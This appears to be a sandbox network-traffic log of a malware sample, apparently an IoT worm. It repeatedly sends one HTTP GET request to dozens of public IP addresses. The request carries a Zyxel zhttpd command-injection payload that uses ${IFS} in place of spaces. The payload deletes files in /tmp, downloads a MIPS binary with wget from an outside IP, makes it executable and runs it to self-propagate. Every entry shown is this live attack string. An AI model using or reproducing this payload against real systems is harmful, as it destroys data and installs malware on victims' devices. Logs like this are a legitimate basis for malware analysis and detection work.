                                        Mar 31, 2024 09:22:34.759860992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8554192.168.2.2341500199.130.78.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759917021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8555192.168.2.2332888191.131.168.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.759963036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8556192.168.2.2339296184.231.198.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760010004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8557192.168.2.2345388138.33.37.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760083914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8558192.168.2.235173074.117.255.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760133982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8559192.168.2.2359000111.134.80.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760169983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8560192.168.2.2340856204.170.2.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760205030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8561192.168.2.2334816153.40.23.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760296106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8562192.168.2.2349482123.56.247.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760344982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8563192.168.2.235801019.124.118.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760410070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8564192.168.2.2360296105.140.146.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760445118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8565192.168.2.233416239.35.6.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760499001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8566192.168.2.2356478207.102.198.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760561943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8567192.168.2.233453076.66.220.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760597944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8568192.168.2.233787051.124.175.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760643959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8569192.168.2.233439266.193.22.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760705948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8570192.168.2.2336418119.116.213.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760765076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8571192.168.2.2339616159.226.46.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760782003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8572192.168.2.235457858.189.202.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760838032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8573192.168.2.234871813.228.63.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760881901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8574192.168.2.233692889.203.82.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760915041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8575192.168.2.2350996132.147.136.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.760982990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8576192.168.2.2337792119.242.141.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761030912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8577192.168.2.2336274137.250.171.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761075020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8578192.168.2.235805417.255.183.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761111975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8579192.168.2.2334842179.138.61.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761183023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8580192.168.2.235524669.188.24.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761209965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8581192.168.2.2348690156.166.197.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761281967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8582192.168.2.23593721.76.95.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761322021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8583192.168.2.233940048.228.250.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761354923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8584192.168.2.235401061.156.171.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761431932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8585192.168.2.235869463.195.200.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761472940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8586192.168.2.235906038.82.240.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761516094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8587192.168.2.2333830107.197.222.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761569977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8588192.168.2.235694417.206.51.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761626959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8589192.168.2.2339514198.158.40.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761707067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8590192.168.2.2345692207.17.55.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761746883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8591192.168.2.2333006141.136.166.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761794090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8592192.168.2.233572813.177.33.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761846066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8593192.168.2.2359848196.90.194.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761908054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8594192.168.2.235360843.183.170.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.761972904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8595192.168.2.234860298.40.123.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762012005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8596192.168.2.2336858133.21.100.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762089968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8597192.168.2.2335110111.163.68.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762173891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8598192.168.2.234733692.87.181.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762218952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8599192.168.2.2353648121.90.90.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762279987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8600192.168.2.235732283.135.142.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762322903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8601192.168.2.2355610182.16.232.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762387991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8602192.168.2.2355988117.214.130.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762414932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8603192.168.2.2353336121.143.162.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762501001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8604192.168.2.2341730221.197.214.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762538910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8605192.168.2.2346882166.97.158.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762589931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8606192.168.2.2337956189.23.229.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762639999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8607192.168.2.233402497.186.60.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762691975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8608192.168.2.2344498126.179.100.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762726068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8609192.168.2.23521964.152.217.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762768984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8610192.168.2.2339436121.100.237.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762834072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8611192.168.2.235843231.122.18.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762887001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8612192.168.2.236078254.46.73.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762938023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8613192.168.2.233797067.242.193.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.762984991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8614192.168.2.233511642.47.184.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763046026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8615192.168.2.234352046.255.56.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763077021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8616192.168.2.2356516165.235.90.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763132095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8617192.168.2.2333798140.65.58.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763178110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8618192.168.2.2336128193.214.221.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763231039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8619192.168.2.2360182223.66.34.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763278961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8620192.168.2.2337430170.215.181.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763348103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8621192.168.2.2345872151.47.131.126443
                                        TimestampBytes transferredDirectionData
